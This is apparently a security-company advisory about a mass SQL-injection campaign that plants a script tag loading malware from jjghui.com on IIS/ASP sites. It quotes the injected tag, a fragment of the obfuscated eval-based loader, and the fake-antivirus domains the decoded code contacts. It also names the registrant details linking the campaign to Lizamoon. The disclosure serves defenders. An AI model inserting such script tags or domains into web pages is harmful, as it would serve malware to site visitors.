We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).
What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:
James Northone firstname.lastname@example.org
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
This leads us to believe the same group is involved on this one as well.
<script src = http://jjghui.com/urchin.js ></script>
var str=["70124", "70124", "70217", "70225", "70209"..
eval ( temp );
After decoded it tries to contact http://www3.strongdefenseiz.in/ (and other domains) to push fake AV’s to the person visiting the site.
Any site that is compromised has to remove the infection from the database and audit their code to make sure it is free from SQL injections.
We will post more updates as we go.
*Our global page lists the malware-related attack domains for the month: http://sucuri.net/global
Update: New domain name: http://nbnjkl.com/urchin.js